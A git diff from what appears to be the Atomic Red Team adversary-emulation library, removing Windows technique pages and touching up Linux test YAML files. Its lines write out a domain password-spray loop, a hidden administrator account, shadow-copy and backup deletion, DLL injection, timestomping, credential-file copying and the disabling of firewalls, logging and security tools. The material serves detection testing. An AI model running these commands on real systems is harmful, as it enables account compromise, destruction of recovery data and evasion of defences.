diff --git a/Windows/Credential_Access/Brute_Force.md b/Windows/Credential_Access/Brute_Force.md deleted file mode 100644 index 4ce257ed..00000000 --- a/Windows/Credential_Access/Brute_Force.md +++ /dev/null @@ -1,16 +0,0 @@ -# Brute Force - -MITRE ATT&CK Technique: [T1110](https://attack.mitre.org/wiki/Technique/T1110) - -## net.exe - -### Password Spray - - - net user /domain > DomainUsers.txt - echo "Password1" >> pass.txt - echo "1q2w3e4r" >> pass.txt - -Execute: - - @FOR /F %n in (DomainUsers.txt) DO @FOR /F %p in (pass.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\COMPANYDC1\IPC$ > NUL diff --git a/Windows/Credential_Access/Create_Account.md b/Windows/Credential_Access/Create_Account.md deleted file mode 100644 index a96139c7..00000000 --- a/Windows/Credential_Access/Create_Account.md +++ /dev/null @@ -1,35 +0,0 @@ -# Create Account - -MITRE ATT&CK Technique: [T1136](https://attack.mitre.org/wiki/Technique/T1136) - -## Net.exe - -Local user add: - - Net user /add Trevor SmshBgr123 - -Add new user to localgroup: - - net localgroup administrators Trevor /add - -Domain add: - - net user \password \domain - -Add user to Active Directory: - - dsadd user CN=John,CN=Users,DC=it,DC=uk,DC=savilltech,DC=com -samid John -pwd Pa55word123 - -# Powershell 5.1 - -The following requires [Powershell 5.1](https://www.microsoft.com/en-us/download/details.aspx?id=54616) - -Additional information [here](https://4sysops.com/archives/the-new-local-user-and-group-cmdlets-in-powershell-5-1/) - -## Add User - - New-LocalUser -FullName 'Trevor R.' -Name 'Trevor' -Password SmshBgr ‑Description 'Pwnage account' - -## Create a group - - New-LocalGroup -Name 'Testgroup' -Description 'Testing group' diff --git a/Windows/Credential_Access/Credentials_in_Files.md b/Windows/Credential_Access/Credentials_in_Files.md deleted file mode 100644 index 334e28c1..00000000 --- a/Windows/Credential_Access/Credentials_in_Files.md +++ /dev/null @@ -1,12 +0,0 @@ -# Credentials in Files - -MITRE ATT&CK Technique: [T1081](https://attack.mitre.org/wiki/Technique/T1081) - -## Group Policy Preference - -[Payload](Payloads/Get-GPPPassword.ps1) -[PowerSploit Source](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1) - -Input: - - Get-GPPPassword -Server EXAMPLE.COM diff --git a/Windows/Credential_Access/Hooking.md b/Windows/Credential_Access/Hooking.md deleted file mode 100755 index 10dccc23..00000000 --- a/Windows/Credential_Access/Hooking.md +++ /dev/null @@ -1,12 +0,0 @@ -## Hooking - -MITRE ATT&CK Technique: [T1179](https://attack.mitre.org/wiki/Technique/T1179) - -### Sample Windows DLL Injection into PowerShell - - mavinject $pid /INJECTRUNNING C:\Atomic\AtomicSSLHook.dll - -## Test Script - -[AtomicSSLHook.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AtomicSSLHook.dll) - diff --git a/Windows/Defense_Evasion/File_Deletion.md b/Windows/Defense_Evasion/File_Deletion.md deleted file mode 100644 index fd2736af..00000000 --- a/Windows/Defense_Evasion/File_Deletion.md +++ /dev/null @@ -1,31 +0,0 @@ -# File Deletion - -MITRE ATT&CK Technique: [T1107](https://attack.mitre.org/wiki/Technique/T1107) - -## cmd - - del /f filename - rmdir example - -## PowerShell - - Remove-Item –path c:\testfolder –recurse - -## vssadmin - - vssadmin.exe Delete Shadows /All /Quiet - - -## wmic - - wmic shadowcopy delete - -## bcdedit - - bcdedit /set {default} bootstatuspolicy ignoreallfailures - - bcdedit /set {default} recoveryenabled no - -## wbadmin - - wbadmin delete catalog -quiet diff --git a/Windows/Defense_Evasion/Hidden_Files_and_Directories.md b/Windows/Defense_Evasion/Hidden_Files_and_Directories.md deleted file mode 100644 index cd1b9651..00000000 --- a/Windows/Defense_Evasion/Hidden_Files_and_Directories.md +++ /dev/null @@ -1,18 +0,0 @@ -## Hidden Files and Directories - -MITRE ATT&CK Technique: [T1158](https://attack.mitre.org/wiki/Technique/T1158) - - -Input: - -Hide a file: - - attrib.exe +h filename.exe - -Mark as hidden, system file and read only: - - attrib.exe +h +s +r evil.dll - -List hidden files: - - dir /a diff --git a/Windows/Defense_Evasion/Timestomp.md b/Windows/Defense_Evasion/Timestomp.md deleted file mode 100644 index 31a4144f..00000000 --- a/Windows/Defense_Evasion/Timestomp.md +++ /dev/null @@ -1,10 +0,0 @@ -# Timestomp - -MITRE ATT&CK Technique: [T1099](https://attack.mitre.org/wiki/Technique/T1099) - -## Timestomp with PowerShell - - #### Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c - - echo "Atomic Test File" > test.txt - PowerShell.exe -com {$file=(gi test.txt);$date='06/06/2006 12:12 pm';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date} diff --git a/Windows/Discovery/Account_Discovery.md b/Windows/Discovery/Account_Discovery.md deleted file mode 100644 index 1f6af058..00000000 --- a/Windows/Discovery/Account_Discovery.md +++ /dev/null @@ -1,85 +0,0 @@ -## Account Discovery - -MITRE ATT&CK Technique: [T1087](https://attack.mitre.org/wiki/Technique/T1087) - -## Test Script - -[Discovery](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/Discovery.bat) - -### Net.exe - -Domain Group Enumeration: - - net group "domain admins" /domain - -Domain User Enumeration: - - net user /domain - -Local Group Enumeration: - - net localgroup "administrators" - -Local User Enumeration: - - net user - -Input: - - net use - -Input: - - net share - -Input: - - net view - -Input: - - net accounts - -## wmic.exe - -### Reconnaissance - -Input: - - wmic useraccount get /ALL - -Input: - - wmic useraccount list - -Input: - - wmic startup list brief - -Input: - - wmic share list - -Input: - - wmic service get name,displayname,pathname,startmode - -Input: - - wmic process list brief - -Input: - - wmic process get caption,executablepath,commandline - -Input: - - wmic qfe get description,installedOn /format:csv - -Input: - - wmic /node:"192.168.0.1" service where (caption like "%sql server (%") - -Input: - - get-wmiobject –class "win32_share" –namespace "root\CIMV2" –computer "targetname" diff --git a/Windows/Exfiltration/Data_Compressed.md b/Windows/Exfiltration/Data_Compressed.md deleted file mode 100644 index ac2307f9..00000000 --- a/Windows/Exfiltration/Data_Compressed.md +++ /dev/null @@ -1,11 +0,0 @@ -# File Deletion - -MITRE ATT&CK Technique: [T1002](https://attack.mitre.org/wiki/Technique/T1002) - -## PowerShell - - powershell.exe dir c:\* -Recurse | Compress-Archive -DestinationPath C:\test\Data.zip - -## Rar - - rar a -r exfilthis.rar *.docx diff --git a/Windows/Persistence/Browser_Extensions.md b/Windows/Persistence/Browser_Extensions.md deleted file mode 100644 index 3550fb8c..00000000 --- a/Windows/Persistence/Browser_Extensions.md +++ /dev/null @@ -1,24 +0,0 @@ -## Browser Extensions - -MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176) - - -### Chrome (Developer Mode) - -Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'. - -Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/) - -Then click 'Select' - -### Chrome (Chrome Web Store) - -Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome' - -### Firefox - -Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on" - -Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json) - -Then click 'Open' \ No newline at end of file diff --git a/Windows/Persistence/Component_Object_Model_Hijacking.md b/Windows/Persistence/Component_Object_Model_Hijacking.md deleted file mode 100644 index 7bfef287..00000000 --- a/Windows/Persistence/Component_Object_Model_Hijacking.md +++ /dev/null @@ -1,17 +0,0 @@ -# Component Object Model Hijacking - -MITRE ATT&CK Technique: [T1122](https://attack.mitre.org/wiki/Technique/T1122) - -## The search order for locating COM Objects can be hijacked, causing unauthorized code to execute. - -#### The presence of objects within - - HKEY_CURRENT_USER\Software\Classes\CLSID\ - -#### May be anomalous and should be investigated since user objects will be loaded prior to machine objects in - - HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\ - -## Test Script - -[COM Hijack Scripts](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/COMHijackScripts) diff --git a/atomics/T1087/T1087.yaml b/atomics/T1087/T1087.yaml index d063354a..8cd0263e 100644 --- a/atomics/T1087/T1087.yaml +++ b/atomics/T1087/T1087.yaml @@ -1,7 +1,7 @@ --- -attack_technique: t1087 +attack_technique: T1087 display_name: Account Discovery - + atomic_tests: - name: List all accounts description: | @@ -14,7 +14,7 @@ atomic_tests: description: Path where captured results will be placed type: Path default: ~/loot.txt - executor: + executor: name: sh command: | cat /etc/passwd > #{output_file} @@ -30,7 +30,7 @@ atomic_tests: description: Path where captured results will be placed type: Path default: ~/loot.txt - executor: + executor: name: sh command: | cat /etc/sudoers > #{output_file} @@ -46,7 +46,7 @@ atomic_tests: description: Path where captured results will be placed type: Path default: ~/loot.txt - executor: + executor: name: sh command: | grep 'x:0:' /etc/passwd > #{output_file} @@ -57,7 +57,7 @@ atomic_tests: supported_platforms: - linux - macos - executor: + executor: name: sh command: | username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username @@ -67,13 +67,13 @@ atomic_tests: xxx supported_platforms: - linux - - macos + - macos args: output_file: description: Path where captured results will be placed type: Path default: ~/loot.txt - executor: + executor: name: sh command: | lastlog > #{output_file} diff --git a/atomics/T1089/T1089.yaml b/atomics/T1089/T1089.yaml index 037052e3..ed4c46fe 100644 --- a/atomics/T1089/T1089.yaml +++ b/atomics/T1089/T1089.yaml @@ -1,14 +1,14 @@ --- -attack_technique: t1089 +attack_technique: T1089 display_name: Disabling Security Tools - + atomic_tests: - name: Disable iptables firewall description: | Disables the iptables firewall supported_platforms: - linux - executor: + executor: name: sh command: | if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ]; @@ -27,7 +27,7 @@ atomic_tests: Disables syslog collection supported_platforms: - linux - executor: + executor: name: sh command: | if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ]; @@ -44,7 +44,7 @@ atomic_tests: Disable the Cb Response service supported_platforms: - linux - executor: + executor: name: sh command: | if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ]; @@ -61,7 +61,7 @@ atomic_tests: Disables SELinux enforcement supported_platforms: - linux - executor: + executor: name: sh command: | setenforce 0 diff --git a/atomics/T1099/T1099.yaml b/atomics/T1099/T1099.yaml index 5c1fca36..b2905803 100644 --- a/atomics/T1099/T1099.yaml +++ b/atomics/T1099/T1099.yaml @@ -1,7 +1,7 @@ --- -attack_technique: t1099 +attack_technique: T1099 display_name: Timestomp - + atomic_tests: - name: Set a file's access timestamp description: | @@ -10,7 +10,7 @@ atomic_tests: - linux - macos input_arguments: - target_filename: + target_filename: description: Path of file that we are going to stomp on last access time type: Path executor: @@ -25,7 +25,7 @@ atomic_tests: - linux - macos input_arguments: - target_filename: + target_filename: description: Path of file that we are going to stomp on last access time type: Path executor: @@ -44,7 +44,7 @@ atomic_tests: - linux - macos input_arguments: - target_filename: + target_filename: description: Path of file that we are going to stomp on last access time type: Path executor: